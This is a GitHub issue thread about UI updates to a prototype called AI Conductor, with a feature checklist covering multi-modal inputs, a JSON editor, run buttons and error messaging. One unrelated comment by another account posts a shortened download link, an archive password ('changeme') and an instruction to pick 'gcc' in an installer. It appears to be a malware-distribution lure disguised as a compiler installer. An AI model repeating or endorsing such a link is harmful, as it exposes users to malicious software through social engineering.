### ISSUE TITLE
AI Conductor UI updates prototype

### ISSUE THREAD

**Issue by natdink** [SEMOSS/semoss-ui#258]
UI updates to AI Conductor

- [x] multi-modal inputs
- [x] json editor at task level and task roadmap level
- [x] add back run buttons / run all?
- [x] update chat ribbon so that it is not task (generation) exclusive
- [ ] output format as image, video, audio, etc
- [ ] can't have collapsible if we use react flow?
- [x] error messaging

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by natdink** [comment]
- [ ] empty state of output

**Comment by natdink** [comment]
Closing out this ticket as I am making updates as comments in dev ticket
